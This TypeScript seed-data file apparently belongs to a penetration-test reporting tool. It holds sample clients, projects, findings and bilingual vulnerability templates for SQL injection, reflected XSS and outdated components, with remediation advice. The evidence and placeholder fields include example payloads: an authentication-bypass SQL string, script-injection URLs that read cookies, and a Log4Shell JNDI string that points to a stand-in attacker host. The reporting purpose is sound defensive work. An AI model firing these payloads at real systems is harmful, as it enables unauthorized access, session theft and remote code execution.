import type { Client, Project, Finding, Vulnerability } from './types';

export const clients: Client[] = [
  { id: 'cli-1', name: 'Innovatech Solutions', contact: 'contact@innovatech.com', logoUrl: 'client-logo-1', language: 'en' },
  { id: 'cli-2', name: 'Quantum Dynamics', contact: 'security@quantum.com', logoUrl: 'client-logo-2', language: 'en' },
  { id: 'cli-3', name: 'SecureBank Corp', contact: 'audit@securebank.com', logoUrl: 'client-logo-3', language: 'es' },
  { id: 'cli-4', name: 'HealthFirst Providers', contact: 'compliance@healthfirst.com', logoUrl: 'client-logo-4', language: 'en' },
];

export const projects: Project[] = [
  { id: 'proj-1', clientId: 'cli-1', name: 'Q3 Web App Pentest', scope: '*.innovatech.com', startDate: '2023-07-01', endDate: '2023-07-15', status: 'Completed' },
  { id: 'proj-2', clientId: 'cli-2', name: 'API Security Audit', scope: 'api.quantum.com', startDate: '2023-08-10', endDate: '2023-08-25', status: 'Completed' },
  { id: 'proj-3', clientId: 'cli-3', name: 'Auditoría Red Interna', scope: '10.0.0.0/8', startDate: '2023-09-01', endDate: '2023-09-30', status: 'In Progress' },
  { id: 'proj-4', clientId: 'cli-1', name: 'Mobile App Assessment', scope: 'Innovatech iOS App', startDate: '2023-10-05', endDate: '2023-10-20', status: 'In Progress' },
];

export const findings: Finding[] = [
  {
    id: 'find-1',
    projectId: 'proj-1',
    vulnerabilityId: 'vuln-001',
    title: 'SQL Injection in Login Form',
    severity: 'Critical',
    cvss: 9.8,
    markdown: `### Description\n\nThe login form at /login is vulnerable to SQL injection. By providing a crafted payload in the username field, an attacker can bypass authentication.\n\n### Evidence\n\nPayload: \`' OR 1=1 -- \`\n\n### Mitigation\n\nUse parameterized queries.`,
    createdAt: '2023-07-05',
    updatedAt: '2023-07-06',
  },
  {
    id: 'find-2',
    projectId: 'proj-1',
    vulnerabilityId: 'vuln-002',
    title: 'Cross-Site Scripting (XSS) in Search Results',
    severity: 'High',
    cvss: 8.8,
    markdown: `### Description\n\nThe search functionality is vulnerable to reflected XSS. Malicious scripts can be injected via the search query parameter.\n\n### Evidence\n\nURL: \`/search?q=<script>alert('XSS')</script>\`\n\n### Mitigation\n\nEncode output and validate input.`,
    createdAt: '2023-07-08',
    updatedAt: '2023-07-08',
  },
  {
    id: 'find-3',
    projectId: 'proj-3',
    title: 'Exposición de servicio SMB sin protección',
    severity: 'Medium',
    cvss: 6.5,
    markdown: `### Descripción\n\nSe ha identificado un servicio SMB en la red interna que permite el acceso anónimo, exponiendo archivos sensibles de la compañía.\n\n### Evidencia\n\n- Host: 10.1.5.22\n- Acceso como invitado habilitado.\n\n### Mitigación\n\nDeshabilitar el acceso anónimo y aplicar autenticación en el recurso compartido SMB.`,
    createdAt: '2023-09-10',
    updatedAt: '2023-09-11',
  }
];

export const vulnerabilities: Vulnerability[] = [
  {
    id: 'vuln-001',
    title_en: 'SQL Injection (SQLi)',
    title_es: 'Inyección SQL (SQLi)',
    cwe: 'CWE-89',
    severity: 'Critical',
    cvss: {
      score: 9.8,
      vectorString: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
      attackVector: 'Network',
      attackComplexity: 'Low',
      privilegesRequired: 'None',
      userInteraction: 'None',
      scope: 'Unchanged',
      confidentiality: 'High',
      integrity: 'High',
      availability: 'High',
    },
    overview_en: 'An attacker can use SQL Injection to bypass authentication, access, modify, and delete data within the database. This occurs when the application insecurely includes user-provided data in SQL queries.',
    overview_es: 'Un atacante puede usar Inyección SQL para eludir la autenticación, acceder, modificar y eliminar datos dentro de la base de datos. Esto ocurre cuando la aplicación incluye de forma insegura datos proporcionados por el usuario en las consultas SQL.',
    technicalDescription_en: 'The application is vulnerable to SQL injection because it concatenates user input directly into SQL statements. A malicious actor can provide specially crafted input that alters the query logic, allowing them to execute arbitrary SQL commands.',
    technicalDescription_es: 'La aplicación es vulnerable a la inyección de SQL porque concatena la entrada del usuario directamente en las sentencias SQL. Un actor malintencionado puede proporcionar una entrada especialmente diseñada que altera la lógica de la consulta, lo que le permite ejecutar comandos SQL arbitrarios.',
    affectedComponents_en: '[TODO: Specify the vulnerable component, e.g., The login form at `/login.php`. The `username` parameter is vulnerable.]',
    affectedComponents_es: '[TODO: Especificar el componente vulnerable, p. ej., El formulario de inicio de sesión en `/login.php`. El parámetro `username` es vulnerable.]',
    impact_en: 'A successful SQLi attack can result in unauthorized access to sensitive data, such as user credentials, personal information, and financial records. It can also lead to data modification or deletion, and in some cases, shell access to the underlying server.',
    impact_es: 'Un ataque de SQLi exitoso puede resultar en acceso no autorizado a datos sensibles, como credenciales de usuario, información personal y registros financieros. También puede conducir a la modificación o eliminación de datos y, en algunos casos, acceso shell al servidor subyacente.',
    recommendations_en: 'It is recommended to use parameterized queries (prepared statements) to prevent SQL injection. Input validation should also be implemented as a secondary defense mechanism.',
    recommendations_es: 'Se recomienda utilizar consultas parametrizadas (prepared statements) para prevenir la inyección de SQL. La validación de entradas también debe implementarse como un mecanismo de defensa secundario.',
    details_en: '[TODO: Provide a detailed technical explanation, context, and proof-of-concept code. Example: `Payload: \' OR 1=1; --`]',
    details_es: '[TODO: Proporcionar una explicación técnica detallada, contexto y código de prueba de concepto. Ejemplo: `Payload: \' OR 1=1; --`]',
    remediation_en: {
      shortTerm: 'Implement input sanitization to filter out special characters like single quotes and semicolons.',
      mediumTerm: 'Refactor all database queries to use parameterized statements provided by the language/framework.',
      longTerm: 'Conduct a full code review of all data access components and provide security training to developers on secure coding practices.',
    },
    remediation_es: {
      shortTerm: 'Implementar la sanitización de entradas para filtrar caracteres especiales como comillas simples y puntos y coma.',
      mediumTerm: 'Refactorizar todas las consultas a la base de datos para utilizar sentencias parametrizadas proporcionadas por el lenguaje/framework.',
      longTerm: 'Realizar una revisión completa del código de todos los componentes de acceso a datos y proporcionar formación en seguridad a los desarrolladores sobre prácticas de codificación segura.',
    },
    references: ['https://owasp.org/www-community/attacks/SQL_Injection', 'https://cwe.mitre.org/data/definitions/89.html'],
    tags: ['OWASP Top 10', 'A03:2021-Injection']
  },
  {
    id: 'vuln-002',
    title_en: 'Reflected Cross-Site Scripting (XSS)',
    title_es: 'Cross-Site Scripting (XSS) Reflejado',
    cwe: 'CWE-79',
    severity: 'Medium',
    cvss: {
      score: 6.1,
      vectorString: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N',
      attackVector: 'Network',
      attackComplexity: 'Low',
      privilegesRequired: 'None',
      userInteraction: 'Required',
      scope: 'Changed',
      confidentiality: 'Low',
      integrity: 'Low',
      availability: 'None',
    },
    overview_en: 'An attacker can inject malicious client-side scripts into web pages viewed by other users. This occurs when the application includes unvalidated and unencoded user input in the HTTP response.',
    overview_es: 'Un atacante puede inyectar scripts maliciosos del lado del cliente en las páginas web vistas por otros usuarios. Esto ocurre cuando la aplicación incluye entradas de usuario no validadas y no codificadas en la respuesta HTTP.',
    technicalDescription_en: 'The application is vulnerable to Reflected XSS. A malicious script can be injected via a query parameter. The server reflects this script back to the user\'s browser, where it is executed in the context of the user\'s session.',
    technicalDescription_es: 'La aplicación es vulnerable a XSS Reflejado. Se puede inyectar un script malicioso a través de un parámetro de consulta. El servidor refleja este script de vuelta al navegador del usuario, donde se ejecuta en el contexto de la sesión del usuario.',
    affectedComponents_en: '[TODO: Specify the vulnerable component, e.g., The search page at `/search`. The `q` parameter is vulnerable.]',
    affectedComponents_es: '[TODO: Especificar el componente vulnerable, p. ej., La página de búsqueda en `/search`. El parámetro `q` es vulnerable.]',
    impact_en: 'XSS can be used to steal session tokens, deface websites, or redirect users to malicious sites. An attacker can impersonate the victim user and perform any actions the user is able to perform.',
    impact_es: 'XSS se puede utilizar para robar tokens de sesión, desfigurar sitios web o redirigir a los usuarios a sitios maliciosos. Un atacante puede hacerse pasar por el usuario víctima y realizar cualquier acción que el usuario pueda realizar.',
    recommendations_en: 'The primary mitigation is to encode all untrusted data before it is displayed in the browser. Implementing a robust Content Security Policy (CSP) is also an effective defense-in-depth measure.',
    recommendations_es: 'La mitigación principal es codificar todos los datos no confiables antes de que se muestren en el navegador. Implementar una Política de Seguridad de Contenido (CSP) robusta también es una medida de defensa en profundidad eficaz.',
    details_en: '[TODO: Provide a detailed technical explanation, context, and proof-of-concept. Example: `/search?q=<script>alert(document.cookie)</script>`]',
    details_es: '[TODO: Proporcionar una explicación técnica detallada, contexto y prueba de concepto. Ejemplo: `/search?q=<script>alert(document.cookie)</script>`]',
    remediation_en: {
      shortTerm: 'Implement context-aware output encoding on the affected pages.',
      mediumTerm: 'Implement a Content Security Policy (CSP) to restrict the sources of executable scripts.',
      longTerm: 'Use a web framework that automatically applies context-aware encoding by default (e.g., React, Angular).',
    },
    remediation_es: {
      shortTerm: 'Implementar codificación de salida consciente del contexto en las páginas afectadas.',
      mediumTerm: 'Implementar una Política de Seguridad de Contenido (CSP) para restringir las fuentes de scripts ejecutables.',
      longTerm: 'Utilizar un framework web que aplique automáticamente la codificación consciente del contexto por defecto (por ejemplo, React, Angular).',
    },
    references: ['https://owasp.org/www-community/attacks/xss/', 'https://cwe.mitre.org/data/definitions/79.html'],
    tags: ['OWASP Top 10', 'A03:2021-Injection']
  },
  {
    id: 'vuln-003',
    title_en: 'Vulnerable and Outdated Components',
    title_es: 'Componentes con Vulnerabilidades Conocidas',
    cwe: 'CWE-1104',
    severity: 'Critical',
    cvss: {
      score: 9.8,
      vectorString: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
      attackVector: 'Network',
      attackComplexity: 'Low',
      privilegesRequired: 'None',
      userInteraction: 'None',
      scope: 'Unchanged',
      confidentiality: 'High',
      integrity: 'High',
      availability: 'High',
    },
    overview_en: 'The application uses third-party libraries or components with known vulnerabilities. An attacker can exploit these flaws to compromise the application, leading to data loss, service disruption, or server takeover.',
    overview_es: 'La aplicación utiliza librerías o componentes de terceros con vulnerabilidades conocidas. Un atacante puede explotar estos fallos para comprometer la aplicación, lo que puede provocar la pérdida de datos, la interrupción del servicio o la toma de control del servidor.',
    technicalDescription_en: '[TODO: Specify the vulnerable library and version, and the vulnerability details. E.g., The application was found to be using `log4j` version 2.14.1, which is vulnerable to the Log4Shell remote code execution vulnerability (CVE-2021-44228).]',
    technicalDescription_es: '[TODO: Especificar la librería y versión vulnerable, y los detalles de la vulnerabilidad. P. ej., Se descubrió que la aplicación utiliza la versión 2.14.1 de `log4j`, que es vulnerable a la vulnerabilidad de ejecución remota de código Log4Shell (CVE-2021-44228).]',
    affectedComponents_en: '[TODO: Specify the component or service using the vulnerable library. E.g., The `com.example.logging.service` component which uses the `log4j` library.]',
    affectedComponents_es: '[TODO: Especificar el componente o servicio que utiliza la librería vulnerable. P. ej., El componente `com.example.logging.service` que utiliza la librería `log4j`.]',
    impact_en: 'Exploitation of this vulnerability allows a remote unauthenticated attacker to execute arbitrary code on the server, leading to a full system compromise.',
    impact_es: 'La explotación de esta vulnerabilidad permite a un atacante remoto no autenticado ejecutar código arbitrario en el servidor, lo que conduce a un compromiso total del sistema.',
    recommendations_en: 'It is recommended to update the vulnerable component to the latest patched version. A Software Composition Analysis (SCA) tool should be used to maintain an inventory of third-party components and monitor for new vulnerabilities.',
    recommendations_es: 'Se recomienda actualizar el componente vulnerable a la última versión parcheada. Se debe utilizar una herramienta de Análisis de Composición de Software (SCA) para mantener un inventario de los componentes de terceros y monitorear nuevas vulnerabilidades.',
    details_en: '[TODO: Provide a detailed technical explanation and proof-of-concept. E.g., An attacker can send a crafted string like `${jndi:ldap://attacker.com/a}` to a log statement...]',
    details_es: '[TODO: Proporcionar una explicación técnica detallada y prueba de concepto. P. ej., Un atacante puede enviar una cadena maliciosa como `${jndi:ldap://attacker.com/a}` a una sentencia de log...]',
    remediation_en: {
      shortTerm: 'Immediately update the vulnerable library (e.g., `log4j`) to the latest secure version.',
      mediumTerm: 'Implement a patch management and vulnerability scanning process for all third-party dependencies.',
      longTerm: 'Integrate a Software Composition Analysis (SCA) tool into the CI/CD pipeline to automatically detect and block vulnerable components from being deployed.',
    },
    remediation_es: {
      shortTerm: 'Actualizar inmediatamente la librería vulnerable (p. ej., `log4j`) a la última versión segura.',
      mediumTerm: 'Implementar un proceso de gestión de parches y escaneo de vulnerabilidades para todas las dependencias de terceros.',
      longTerm: 'Integrar una herramienta de Análisis de Composición de Software (SCA) en el pipeline de CI/CD para detectar y bloquear automáticamente el despliegue de componentes vulnerables.',
    },
    references: ['https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/', 'https://cwe.mitre.org/data/definitions/1104.html'],
    tags: ['OWASP Top 10', 'A06:2021-Vulnerable and Outdated Components']
  }
];
